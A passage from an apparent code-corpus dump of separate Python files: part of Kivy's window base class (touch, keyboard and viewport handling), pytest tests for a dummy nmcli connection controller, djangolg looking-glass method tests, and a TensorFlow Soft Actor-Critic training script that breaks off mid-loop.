self.canvas.after.remove(widget.canvas)\n elif widget.canvas in self.canvas.before.children:\n self.canvas.before.remove(widget.canvas)\n widget.parent = None\n widget.unbind(\n pos_hint=self._update_childsize,\n size_hint=self._update_childsize,\n size=self._update_childsize,\n pos=self._update_childsize)\n\n def clear(self):\n '''Clear the window with the background color'''\n # XXX FIXME use late binding\n from kivy.graphics.opengl import glClearColor, glClear, \\\n GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT, GL_STENCIL_BUFFER_BIT\n cc = self._clearcolor\n if cc is not None:\n glClearColor(*cc)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT |\n GL_STENCIL_BUFFER_BIT)\n\n def set_title(self, title):\n '''Set the window title.\n\n .. versionadded:: 1.0.5\n '''\n self.title = title\n\n def set_icon(self, filename):\n '''Set the icon of the window.\n\n .. versionadded:: 1.0.5\n '''\n self.icon = filename\n\n def to_widget(self, x, y, initial=True, relative=False):\n return (x, y)\n\n def to_window(self, x, y, initial=True, relative=False):\n return (x, y)\n\n def _apply_transform(self, m):\n return m\n\n def get_window_matrix(self, x=0, y=0):\n m = Matrix()\n m.translate(x, y, 0)\n return m\n\n def get_root_window(self):\n return self\n\n def get_parent_window(self):\n return self\n\n def get_parent_layout(self):\n return None\n\n def on_draw(self):\n self.clear()\n self.render_context.draw()\n\n def on_motion(self, etype, me):\n '''Event called when a Motion Event is received.\n\n :Parameters:\n `etype`: str\n One of 'begin', 'update', 'end'\n `me`: :class:`~kivy.input.motionevent.MotionEvent`\n The Motion Event currently dispatched.\n '''\n if me.is_touch:\n w, h = self.system_size\n if platform == 'ios' or self._density != 1:\n w, h = self.size\n me.scale_for_screen(w, h, rotation=self._rotation,\n smode=self.softinput_mode,\n kheight=self.keyboard_height)\n if etype == 'begin':\n self.dispatch('on_touch_down', me)\n elif etype == 'update':\n self.dispatch('on_touch_move', me)\n elif etype == 'end':\n self.dispatch('on_touch_up', me)\n FocusBehavior._handle_post_on_touch_up(me)\n\n def on_touch_down(self, touch):\n '''Event called when a touch down event is initiated.\n\n .. versionchanged:: 1.9.0\n The touch `pos` is now transformed to window coordinates before\n this method is called. Before, the touch `pos` coordinate would be\n `(0, 0)` when this method was called.\n '''\n for w in self.children[:]:\n if w.dispatch('on_touch_down', touch):\n return True\n\n def on_touch_move(self, touch):\n '''Event called when a touch event moves (changes location).\n\n .. versionchanged:: 1.9.0\n The touch `pos` is now transformed to window coordinates before\n this method is called. Before, the touch `pos` coordinate would be\n `(0, 0)` when this method was called.\n '''\n for w in self.children[:]:\n if w.dispatch('on_touch_move', touch):\n return True\n\n def on_touch_up(self, touch):\n '''Event called when a touch event is released (terminated).\n\n .. versionchanged:: 1.9.0\n The touch `pos` is now transformed to window coordinates before\n this method is called. 
Before, the touch `pos` coordinate would be\n `(0, 0)` when this method was called.\n '''\n for w in self.children[:]:\n if w.dispatch('on_touch_up', touch):\n return True\n\n def on_resize(self, width, height):\n '''Event called when the window is resized.'''\n self.update_viewport()\n\n def update_viewport(self):\n from kivy.graphics.opengl import glViewport\n from kivy.graphics.transformation import Matrix\n from math import radians\n\n w, h = self.system_size\n if self._density != 1:\n w, h = self.size\n\n smode = self.softinput_mode\n kheight = self.keyboard_height\n\n w2, h2 = w / 2., h / 2.\n r = radians(self.rotation)\n\n x, y = 0, 0\n _h = h\n if smode:\n y = kheight\n if smode == 'scale':\n _h -= kheight\n\n # prepare the viewport\n glViewport(x, y, w, _h)\n\n # do projection matrix\n projection_mat = Matrix()\n projection_mat.view_clip(0.0, w, 0.0, h, -1.0, 1.0, 0)\n self.render_context['projection_mat'] = projection_mat\n\n # do modelview matrix\n modelview_mat = Matrix().translate(w2, h2, 0)\n modelview_mat = modelview_mat.multiply(Matrix().rotate(r, 0, 0, 1))\n\n w, h = self.size\n w2, h2 = w / 2., h / 2.\n modelview_mat = modelview_mat.multiply(Matrix().translate(-w2, -h2, 0))\n self.render_context['modelview_mat'] = modelview_mat\n\n # redraw canvas\n self.canvas.ask_update()\n\n # and update childs\n self.update_childsize()\n\n def update_childsize(self, childs=None):\n width, height = self.size\n if childs is None:\n childs = self.children\n for w in childs:\n shw, shh = w.size_hint\n if shw and shh:\n w.size = shw * width, shh * height\n elif shw:\n w.width = shw * width\n elif shh:\n w.height = shh * height\n for key, value in w.pos_hint.items():\n if key == 'x':\n w.x = value * width\n elif key == 'right':\n w.right = value * width\n elif key == 'y':\n w.y = value * height\n elif key == 'top':\n w.top = value * height\n elif key == 'center_x':\n w.center_x = value * width\n elif key == 'center_y':\n w.center_y = value * height\n\n def screenshot(self, name='screenshot{:04d}.png'):\n '''Save the actual displayed image in a file\n '''\n i = 0\n path = None\n if name != 'screenshot{:04d}.png':\n _ext = name.split('.')[-1]\n name = ''.join((name[:-(len(_ext) + 1)], '{:04d}.', _ext))\n while True:\n i += 1\n path = join(getcwd(), name.format(i))\n if not exists(path):\n break\n return path\n\n def on_rotate(self, rotation):\n '''Event called when the screen has been rotated.\n '''\n pass\n\n def on_close(self, *largs):\n '''Event called when the window is closed'''\n Modules.unregister_window(self)\n EventLoop.remove_event_listener(self)\n\n def on_request_close(self, *largs, **kwargs):\n '''Event called before we close the window. If a bound function returns\n `True`, the window will not be closed. If the the event is triggered\n because of the keyboard escape key, the keyword argument `source` is\n dispatched along with a value of `keyboard` to the bound functions.\n\n .. 
warning::\n When the bound function returns True the window will not be closed,\n so use with care because the user would not be able to close the\n program, even if the red X is clicked.\n '''\n pass\n\n def on_mouse_down(self, x, y, button, modifiers):\n '''Event called when the mouse is used (pressed/released)'''\n pass\n\n def on_mouse_move(self, x, y, modifiers):\n '''Event called when the mouse is moved with buttons pressed'''\n pass\n\n def on_mouse_up(self, x, y, button, modifiers):\n '''Event called when the mouse is moved with buttons pressed'''\n pass\n\n def on_joy_axis(self, stickid, axisid, value):\n '''Event called when a joystick has a stick or other axis moved\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_hat(self, stickid, hatid, value):\n '''Event called when a joystick has a hat/dpad moved\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_ball(self, stickid, ballid, value):\n '''Event called when a joystick has a ball moved\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_button_down(self, stickid, buttonid):\n '''Event called when a joystick has a button pressed\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_button_up(self, stickid, buttonid):\n '''Event called when a joystick has a button released\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_keyboard(self, key, scancode=None, codepoint=None,\n modifier=None, **kwargs):\n '''Event called when keyboard is used.\n\n .. warning::\n Some providers may omit `scancode`, `codepoint` and/or `modifier`.\n '''\n if 'unicode' in kwargs:\n Logger.warning(\"The use of the unicode parameter is deprecated, \"\n \"and will be removed in future versions. Use \"\n \"codepoint instead, which has identical \"\n \"semantics.\")\n\n # Quit if user presses ESC or the typical OSX shortcuts CMD+q or CMD+w\n # TODO If just CMD+w is pressed, only the window should be closed.\n is_osx = platform == 'darwin'\n if WindowBase.on_keyboard.exit_on_escape:\n if key == 27 or all([is_osx, key in [113, 119], modifier == 1024]):\n if not self.dispatch('on_request_close', source='keyboard'):\n stopTouchApp()\n self.close()\n return True\n\n if Config:\n on_keyboard.exit_on_escape = Config.getboolean('kivy', 'exit_on_escape')\n\n def __exit(section, name, value):\n WindowBase.__dict__['on_keyboard'].exit_on_escape = \\\n Config.getboolean('kivy', 'exit_on_escape')\n\n Config.add_callback(__exit, 'kivy', 'exit_on_escape')\n\n def on_key_down(self, key, scancode=None, codepoint=None,\n modifier=None, **kwargs):\n '''Event called when a key is down (same arguments as on_keyboard)'''\n if 'unicode' in kwargs:\n Logger.warning(\"The use of the unicode parameter is deprecated, \"\n \"and will be removed in future versions. Use \"\n \"codepoint instead, which has identical \"\n \"semantics.\")\n\n def on_key_up(self, key, scancode=None, codepoint=None,\n modifier=None, **kwargs):\n '''Event called when a key is released (same arguments as on_keyboard)\n '''\n if 'unicode' in kwargs:\n Logger.warning(\"The use of the unicode parameter is deprecated, \"\n \"and will be removed in future versions. Use \"\n \"codepoint instead, which has identical \"\n \"semantics.\")\n\n def on_textinput(self, text):\n '''Event called whem text: i.e. alpha numeric non control keys or set\n of keys is entered. As it is not gaurenteed whether we get one\n character or multiple ones, this event supports handling multiple\n characters.\n\n .. 
versionadded:: 1.9.0\n '''\n pass\n\n def on_dropfile(self, filename):\n '''Event called when a file is dropped on the application.\n\n .. warning::\n\n This event currently works with sdl2 window provider, on pygame\n window provider and MacOSX with a patched version of pygame.\n This event is left in place for further evolution\n (ios, android etc.)\n\n .. versionadded:: 1.2.0\n '''\n pass\n\n @reify\n def dpi(self):\n '''Return the DPI of the screen. If the implementation doesn't support\n any DPI lookup, it will just return 96.\n\n .. warning::\n\n This value is not cross-platform. Use\n :attr:`kivy.base.EventLoop.dpi` instead.\n '''\n return 96.\n\n def configure_keyboards(self):\n # Configure how to provide keyboards (virtual or not)\n\n # register system keyboard to listening keys from window\n sk = self._system_keyboard\n self.bind(\n on_key_down=sk._on_window_key_down,\n on_key_up=sk._on_window_key_up,\n on_textinput=sk._on_window_textinput)\n\n # use the device's real keyboard\n self.use_syskeyboard = True\n\n # use the device's real keyboard\n self.allow_vkeyboard = False\n\n # one single vkeyboard shared between all widgets\n self.single_vkeyboard = True\n\n # the single vkeyboard is always sitting at the same position\n self.docked_vkeyboard = False\n\n # now read the configuration\n mode = Config.get('kivy', 'keyboard_mode')\n if mode not in ('', 'system', 'dock', 'multi', 'systemanddock',\n 'systemandmulti'):\n Logger.critical('Window: unknown keyboard mode %r' % mode)\n\n # adapt mode according to the configuration\n if mode == 'system':\n self.use_syskeyboard = True\n self.allow_vkeyboard = False\n self.single_vkeyboard = True\n self.docked_vkeyboard = False\n elif mode == 'dock':\n self.use_syskeyboard = False\n self.allow_vkeyboard = True\n self.single_vkeyboard = True\n self.docked_vkeyboard = True\n elif mode == 'multi':\n self.use_syskeyboard = False\n self.allow_vkeyboard = True\n self.single_vkeyboard = False\n self.docked_vkeyboard = False\n elif mode == 'systemanddock':\n self.use_syskeyboard = True\n self.allow_vkeyboard = True\n self.single_vkeyboard = True\n self.docked_vkeyboard = True\n elif mode == 'systemandmulti':\n self.use_syskeyboard = True\n self.allow_vkeyboard = True\n self.single_vkeyboard = False\n self.docked_vkeyboard = False\n\n Logger.info(\n 'Window: virtual keyboard %sallowed, %s, %s' % (\n '' if self.allow_vkeyboard else 'not ',\n 'single mode' if self.single_vkeyboard else 'multiuser mode',\n 'docked' if self.docked_vkeyboard else 'not docked'))\n\n def set_vkeyboard_class(self, cls):\n '''.. versionadded:: 1.0.8\n\n Set the VKeyboard class to use. If set to None, it will use the\n :class:`kivy.uix.vkeyboard.VKeyboard`.\n '''\n self._vkeyboard_cls = cls\n\n def release_all_keyboards(self):\n '''.. versionadded:: 1.0.8\n\n This will ensure that no virtual keyboard / system keyboard is\n requested. All instances will be closed.\n '''\n for key in list(self._keyboards.keys())[:]:\n keyboard = self._keyboards[key]\n if keyboard:\n keyboard.release()\n\n def request_keyboard(self, callback, target, input_type='text'):\n '''.. versionadded:: 1.0.4\n\n Internal widget method to request the keyboard. This method is rarely\n required by the end-user as it is handled automatically by the\n :class:`~kivy.uix.textinput.TextInput`. 
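        A minimal usage sketch (illustrative only: ``my_widget`` and the two
        handler names below are hypothetical placeholders, not part of this
        API)::

            from kivy.core.window import Window

            def _on_keyboard_closed():
                # called when the keyboard is taken away from us
                print('keyboard released')

            def _on_key_down(keyboard, keycode, text, modifiers):
                # keycode is a (int, string) pair, see Keyboard.keycodes
                print('key pressed:', keycode)

            keyboard = Window.request_keyboard(
                _on_keyboard_closed, my_widget, input_type='text')
            keyboard.bind(on_key_down=_on_key_down)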
We expose it in case you want\n to handle the keyboard manually for unique input scenarios.\n\n A widget can request the keyboard, indicating a callback to call\n when the keyboard is released (or taken by another widget).\n\n :Parameters:\n `callback`: func\n Callback that will be called when the keyboard is\n closed. This can be because somebody else requested the\n keyboard or the user closed it.\n `target`: Widget\n Attach the keyboard to the specified `target`. This should be\n the widget that requested the keyboard. Ensure you have a\n different target attached to each keyboard if you're working in\n a multi user mode.\n\n .. versionadded:: 1.0.8\n\n `input_type`: string\n Choose the type of soft keyboard to request. Can be one of\n 'text', 'number', 'url', 'mail', 'datetime', 'tel', 'address'.\n\n .. note::\n\n `input_type` is currently only honored on mobile devices.\n\n .. versionadded:: 1.8.0\n\n :Return:\n An instance of :class:`Keyboard` containing the callback, target,\n and if the configuration allows it, a\n :class:`~kivy.uix.vkeyboard.VKeyboard` instance attached as a\n *.widget* property.\n\n .. note::\n\n The behavior of this function is heavily influenced by the current\n `keyboard_mode`. Please see the Config's\n :ref:`configuration tokens ` section for\n more information.\n\n '''\n\n # release any previous keyboard attached.\n self.release_keyboard(target)\n\n # if we can use virtual vkeyboard, activate it.\n if self.allow_vkeyboard:\n keyboard = None\n\n # late import\n global VKeyboard\n if VKeyboard is None and self._vkeyboard_cls is None:\n from kivy.uix.vkeyboard import VKeyboard\n self._vkeyboard_cls = VKeyboard\n\n # if the keyboard doesn't exist, create it.\n key = 'single' if self.single_vkeyboard else target\n if key not in self._keyboards:\n vkeyboard = self._vkeyboard_cls()\n keyboard = Keyboard(widget=vkeyboard, window=self)\n vkeyboard.bind(\n on_key_down=keyboard._on_vkeyboard_key_down,\n on_key_up=keyboard._on_vkeyboard_key_up,\n on_textinput=keyboard._on_vkeyboard_textinput)\n self._keyboards[key] = keyboard\n else:\n keyboard = self._keyboards[key]\n\n # configure vkeyboard\n keyboard.target = keyboard.widget.target = target\n keyboard.callback = keyboard.widget.callback = callback\n\n # add to the window\n self.add_widget(keyboard.widget)\n\n # only after add, do dock mode\n keyboard.widget.docked = self.docked_vkeyboard\n keyboard.widget.setup_mode()\n\n else:\n # system keyboard, just register the callback.\n keyboard = self._system_keyboard\n keyboard.callback = callback\n keyboard.target = target\n\n # use system (hardware) keyboard according to flag\n if self.allow_vkeyboard and self.use_syskeyboard:\n self.unbind(\n on_key_down=keyboard._on_window_key_down,\n on_key_up=keyboard._on_window_key_up,\n on_textinput=keyboard._on_window_textinput)\n self.bind(\n on_key_down=keyboard._on_window_key_down,\n on_key_up=keyboard._on_window_key_up,\n on_textinput=keyboard._on_window_textinput)\n\n return keyboard\n\n def release_keyboard(self, target=None):\n '''.. versionadded:: 1.0.4\n\n Internal method for the widget to release the real-keyboard. 
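        A widget that obtained a keyboard through :meth:`request_keyboard`
        would typically release it like this (``my_widget`` is a hypothetical
        placeholder for the widget that requested it)::

            Window.release_keyboard(my_widget)
            # or, equivalently, via the returned Keyboard instance:
            # keyboard.release()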
Check\n :meth:`request_keyboard` to understand how it works.\n '''\n if self.allow_vkeyboard:\n key = 'single' if self.single_vkeyboard else target\n if key not in self._keyboards:\n return\n keyboard = self._keyboards[key]\n callback = keyboard.callback\n if callback:\n keyboard.callback = None\n callback()\n keyboard.target = None\n self.remove_widget(keyboard.widget)\n if key != 'single' and key in self._keyboards:\n del self._keyboards[key]\n elif self._system_keyboard.callback:\n # this way will prevent possible recursion.\n callback = self._system_keyboard.callback\n self._system_keyboard.callback = None\n callback()\n return True\n\n#: Instance of a :class:`WindowBase` implementation\nwindow_impl = []\nif platform == 'linux':\n window_impl += [('egl_rpi', 'window_egl_rpi', 'WindowEglRpi')]\nif USE_SDL2:\n window_impl += [('sdl2', 'window_sdl2', 'WindowSDL')]\nelse:\n window_impl += [\n ('pygame', 'window_pygame', 'WindowPygame')]\nif platform == 'linux':\n window_impl += [('x11', 'window_x11', 'WindowX11')]\nWindow = core_select_lib('window', window_impl, True)\n"} {"ext": "py", "sha": "1a2ecbcb6ca1ff23a1edf9dcb9c5598434fd0b11", "content": "import pytest\n\nfrom nmcli.data import Connection\nfrom nmcli.dummy._connection import DummyConnectionControl\n\n\ndef test_call():\n result_call = [Connection('a', 'b', 'ethernet', 'eth0')]\n c = DummyConnectionControl(result_call)\n assert c() == result_call\n\n\ndef test_call_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c()\n\n\ndef test_add():\n c = DummyConnectionControl()\n conn_type = 'ethernet'\n options = {\n 'key': 'value'\n }\n ifname = 'eth0'\n name = 'MyHome'\n autoconnect = True\n c.add(conn_type, options, ifname, name, autoconnect)\n assert c.add_args[0] == (conn_type, options, ifname, name, autoconnect)\n\n c.add(conn_type, options, ifname, name, False)\n assert c.add_args[1] == (conn_type, options, ifname, name, False)\n\n c.add(conn_type, options, ifname, name)\n assert c.add_args[2] == (conn_type, options, ifname, name, None)\n\n\ndef test_add_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.add('ethernet')\n\n\ndef test_modify():\n c = DummyConnectionControl()\n options = {\n 'key': 'value'\n }\n name = 'MyHome'\n c.modify(name, options)\n assert c.modify_args[0] == (name, options)\n\n\ndef test_modify_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.modify('ethernet', {'key': 'value'})\n\n\ndef test_delete():\n c = DummyConnectionControl()\n name = 'MyHome'\n c.delete(name)\n assert c.delete_args[0] == name\n\n\ndef test_delete_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.delete('ethernet')\n\n\ndef test_up():\n c = DummyConnectionControl()\n name = 'MyHome'\n c.up(name)\n assert c.up_args[0] == name\n\n\ndef test_up_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.up('ethernet')\n\n\ndef test_down():\n c = DummyConnectionControl()\n name = 'MyHome'\n c.down(name)\n assert c.down_args[0] == name\n\n\ndef test_down_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.down('ethernet')\n\n\ndef test_show():\n result_show = {\n 'key': 'value'\n }\n c = DummyConnectionControl(result_show=result_show)\n name = 'MyHome'\n assert c.show(name) == result_show\n\n\ndef 
test_show_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.show('MyHome')\n\n\ndef test_show_when_no_arguments_are_passed():\n c = DummyConnectionControl()\n with pytest.raises(ValueError):\n c.show('MyHome')\n\n\ndef test_reload():\n c = DummyConnectionControl()\n c.reload()\n assert c.called_reload == 1\n\n\ndef test_reload_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.reload()\n"} {"ext": "py", "sha": "1a2ecc01c02d5a7aaafdb9765bdc7895de56fd7b", "content": "# Copyright 2017 Workonline Communications (Pty) Ltd. All rights reserved.\n#\n# The contents of this file are licensed under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with the\n# License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\"\"\"Method test classes for djangolg.\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\n\nfrom djangolg import dialects, methods\nfrom djangolg.methods.base import BaseMethod\n\n\nclass MethodTestCase(TestCase):\n \"\"\"Test djangolg methods.\"\"\"\n\n def test_available_methods(self):\n \"\"\"Test available_methods helper.\"\"\"\n methods_map = methods.available_methods(\"map\")\n methods_list = methods.available_methods(\"list\")\n assert isinstance(methods_map, dict)\n assert isinstance(methods_list, list)\n try:\n methods.available_methods(\"wrong\")\n except Exception as e:\n assert isinstance(e, ValueError)\n assert \"{}\".format(e) == \"invalid output type: wrong\"\n\n def test_get_method(self):\n \"\"\"Test get_method helper.\"\"\"\n for method_name in methods.available_methods(\"list\"):\n method = methods.get_method(name=method_name)\n assert isinstance(method, BaseMethod)\n try:\n methods.get_method()\n except Exception as e:\n assert isinstance(e, methods.MethodNotFound)\n try:\n methods.get_method(name=dict())\n except Exception as e:\n assert isinstance(e, methods.LookingGlassMethodError)\n\n def test_method_init_failure(self):\n \"\"\"Test method initiation failure.\"\"\"\n try:\n BaseMethod(dialect=\"string\")\n except Exception as e:\n assert isinstance(e, TypeError)\n\n def test_method_dialect_functions(self):\n \"\"\"Test method dialect getter and setter and other methods.\"\"\"\n for method_name in methods.available_methods(output=\"list\"):\n method = methods.get_method(name=method_name)\n assert method.dialect is None\n try:\n method.dialect = \"wrong_type\"\n except Exception as e:\n assert isinstance(e, TypeError)\n for dialect_name in dialects.available_dialects(output=\"list\"):\n dialect = dialects.get_dialect(dialect_name)\n method.dialect = dialect\n assert method.dialect is dialect\n if method.options:\n for index, option in method.option_choices():\n assert method.get_command(target=method.test_target,\n option_index=index)\n else:\n assert method.get_command(target=method.test_target)\n"} {"ext": "py", "sha": "1a2ecc4174f6c45060cfce4f1cd969cb4664de63", "content": "import numpy as np\nimport tensorflow as tf\nfrom numbers import Number\nimport gym\nimport 
time\nfrom spinup.algos.tf1.sac1 import core\nfrom spinup.algos.tf1.sac1.core import get_vars\nfrom spinup.utils.logx import EpochLogger\nfrom gym.spaces import Box, Discrete\nfrom spinup.utils.frame_stack import FrameStack\nimport os\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for SAC agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs1_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.obs2_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.acts_buf = np.zeros([size, act_dim], dtype=np.float32)\n self.rews_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs1_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr+1) % self.max_size\n self.size = min(self.size+1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n idxs = np.random.randint(0, self.size, size=batch_size)\n return dict(obs1=self.obs1_buf[idxs],\n obs2=self.obs2_buf[idxs],\n acts=self.acts_buf[idxs],\n rews=self.rews_buf[idxs],\n done=self.done_buf[idxs])\n\n\"\"\"\n\nSoft Actor-Critic\n\n(With slight variations that bring it closer to TD3)\n\n\"\"\"\ndef sac1(args, env_fn, actor_critic=core.mlp_actor_critic, ac_kwargs=dict(), seed=0,\n steps_per_epoch=1000, epochs=100, replay_size=int(2e6), gamma=0.99, reward_scale=1.0,\n polyak=0.995, lr=5e-4, alpha=0.2, batch_size=200, start_steps=10000,\n max_ep_len_train=1000, max_ep_len_test=1000, logger_kwargs=dict(), save_freq=1):\n \"\"\"\n\n Args:\n env_fn : A function which creates a copy of the environment.\n The environment must satisfy the OpenAI Gym API.\n\n actor_critic: A function which takes in placeholder symbols \n for state, ``x_ph``, and action, ``a_ph``, and returns the main \n outputs from the agent's Tensorflow computation graph:\n\n =========== ================ ======================================\n Symbol Shape Description\n =========== ================ ======================================\n ``mu`` (batch, act_dim) | Computes mean actions from policy\n | given states.\n ``pi`` (batch, act_dim) | Samples actions from policy given \n | states.\n ``logp_pi`` (batch,) | Gives log probability, according to\n | the policy, of the action sampled by\n | ``pi``. Critical: must be differentiable\n | with respect to policy parameters all\n | the way through action sampling.\n ``q1`` (batch,) | Gives one estimate of Q* for \n | states in ``x_ph`` and actions in\n | ``a_ph``.\n ``q2`` (batch,) | Gives another estimate of Q* for \n | states in ``x_ph`` and actions in\n | ``a_ph``.\n ``q1_pi`` (batch,) | Gives the composition of ``q1`` and \n | ``pi`` for states in ``x_ph``: \n | q1(x, pi(x)).\n ``q2_pi`` (batch,) | Gives the composition of ``q2`` and \n | ``pi`` for states in ``x_ph``: \n | q2(x, pi(x)).\n =========== ================ ======================================\n\n ac_kwargs (dict): Any kwargs appropriate for the actor_critic \n function you provided to SAC.\n\n seed (int): Seed for random number generators.\n\n steps_per_epoch (int): Number of steps of interaction (state-action pairs) \n for the agent and the environment in each epoch.\n\n epochs (int): Number of epochs to run and train agent.\n\n replay_size (int): Maximum length of replay buffer.\n\n gamma (float): Discount factor. 
(Always between 0 and 1.)\n\n polyak (float): Interpolation factor in polyak averaging for target \n networks. Target networks are updated towards main networks \n according to:\n\n .. math:: \\\\theta_{\\\\text{targ}} \\\\leftarrow \n \\\\rho \\\\theta_{\\\\text{targ}} + (1-\\\\rho) \\\\theta\n\n where :math:`\\\\rho` is polyak. (Always between 0 and 1, usually \n close to 1.)\n\n lr (float): Learning rate (used for policy/value/alpha learning).\n\n alpha (float/'auto'): Entropy regularization coefficient. (Equivalent to\n inverse of reward scale in the original SAC paper.) / 'auto': alpha is automated.\n\n batch_size (int): Minibatch size for SGD.\n\n start_steps (int): Number of steps for uniform-random action selection,\n before running real policy. Helps exploration.\n\n max_ep_len (int): Maximum length of trajectory / episode / rollout.\n\n logger_kwargs (dict): Keyword args for EpochLogger.\n\n save_freq (int): How often (in terms of gap between epochs) to save\n the current policy and value function.\n\n \"\"\"\n if not args.is_test:\n logger = EpochLogger(**logger_kwargs)\n logger.save_config(locals())\n\n tf.set_random_seed(seed)\n np.random.seed(seed)\n\n env, test_env = env_fn(3), env_fn(1)\n obs_dim = env.observation_space.shape[0]\n act_dim = env.action_space.shape[0]\n\n # Action limit for clamping: critically, assumes all dimensions share the same bound!\n act_limit = env.action_space.high[0]\n\n # Share information about action space with policy architecture\n ac_kwargs['action_space'] = env.action_space\n\n # Inputs to computation graph\n x_ph, a_ph, x2_ph, r_ph, d_ph = core.placeholders(obs_dim, act_dim, obs_dim, None, None)\n\n # Main outputs from computation graph\n with tf.variable_scope('main'):\n mu, pi, logp_pi, logp_pi2, q1, q2, q1_pi, q2_pi = actor_critic(x_ph, x2_ph, a_ph, **ac_kwargs)\n \n # Target value network\n with tf.variable_scope('target'):\n _, _, logp_pi_, _, _, _,q1_pi_, q2_pi_= actor_critic(x2_ph, x2_ph, a_ph, **ac_kwargs)\n\n # Experience buffer\n replay_buffer = ReplayBuffer(obs_dim=obs_dim, act_dim=act_dim, size=replay_size)\n\n # Count variables\n var_counts = tuple(core.count_vars(scope) for scope in \n ['main/pi', 'main/q1', 'main/q2', 'main'])\n print(('\\nNumber of parameters: \\t pi: %d, \\t' + \\\n 'q1: %d, \\t q2: %d, \\t total: %d\\n')%var_counts)\n\n######\n if alpha == 'auto':\n target_entropy = (-np.prod(env.action_space.shape))\n\n log_alpha = tf.get_variable( 'log_alpha', dtype=tf.float32, initializer=0.0)\n alpha = tf.exp(log_alpha)\n\n alpha_loss = tf.reduce_mean(-log_alpha * tf.stop_gradient(logp_pi + target_entropy))\n\n alpha_optimizer = tf.train.AdamOptimizer(learning_rate=lr*0.1, name='alpha_optimizer')\n train_alpha_op = alpha_optimizer.minimize(loss=alpha_loss, var_list=[log_alpha])\n######\n\n # Min Double-Q:\n min_q_pi = tf.minimum(q1_pi_, q2_pi_)\n\n # Targets for Q and V regression\n v_backup = tf.stop_gradient(min_q_pi - alpha * logp_pi2)\n q_backup = r_ph + gamma*(1-d_ph)*v_backup\n\n\n # Soft actor-critic losses\n pi_loss = tf.reduce_mean(alpha * logp_pi - q1_pi)\n q1_loss = 0.5 * tf.reduce_mean((q_backup - q1)**2)\n q2_loss = 0.5 * tf.reduce_mean((q_backup - q2)**2)\n value_loss = q1_loss + q2_loss\n\n # Policy train op \n # (has to be separate from value train op, because q1_pi appears in pi_loss)\n pi_optimizer = tf.train.AdamOptimizer(learning_rate=lr)\n train_pi_op = pi_optimizer.minimize(pi_loss, var_list=get_vars('main/pi'))\n\n # Value train op\n # (control dep of train_pi_op because sess.run otherwise 
evaluates in nondeterministic order)\n value_optimizer = tf.train.AdamOptimizer(learning_rate=lr)\n value_params = get_vars('main/q')\n with tf.control_dependencies([train_pi_op]):\n train_value_op = value_optimizer.minimize(value_loss, var_list=value_params)\n\n # Polyak averaging for target variables\n # (control flow because sess.run otherwise evaluates in nondeterministic order)\n with tf.control_dependencies([train_value_op]):\n target_update = tf.group([tf.assign(v_targ, polyak*v_targ + (1-polyak)*v_main)\n for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n # All ops to call during one training step\n if isinstance(alpha, Number):\n step_ops = [pi_loss, q1_loss, q2_loss, q1, q2, logp_pi, tf.identity(alpha),\n train_pi_op, train_value_op, target_update]\n else:\n step_ops = [pi_loss, q1_loss, q2_loss, q1, q2, logp_pi, alpha,\n train_pi_op, train_value_op, target_update, train_alpha_op]\n\n\n # Initializing targets to match main variables\n target_init = tf.group([tf.assign(v_targ, v_main)\n for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n sess.run(target_init)\n\n\n ############################## save and restore ############################\n\n saver = tf.train.Saver()\n\n checkpoint_path = logger_kwargs['output_dir'] + '/checkpoints'\n if not os.path.exists(checkpoint_path):\n os.makedirs(checkpoint_path)\n\n if args.is_test or args.is_restore_train:\n ckpt = tf.train.get_checkpoint_state(checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"Model restored.\")\n\n\n\n def get_action(o, deterministic=False):\n act_op = mu if deterministic else pi\n return sess.run(act_op, feed_dict={x_ph: o.reshape(1,-1)})[0]\n\n\n ############################## test ############################\n\n if args.is_test:\n test_env = gym.make(args.env)\n ave_ep_ret = 0\n for j in range(10000):\n o, r, d, ep_ret, ep_len = test_env.reset(), 0, False, 0, 0\n while not d: # (d or (ep_len == 2000)):\n o, r, d, _ = 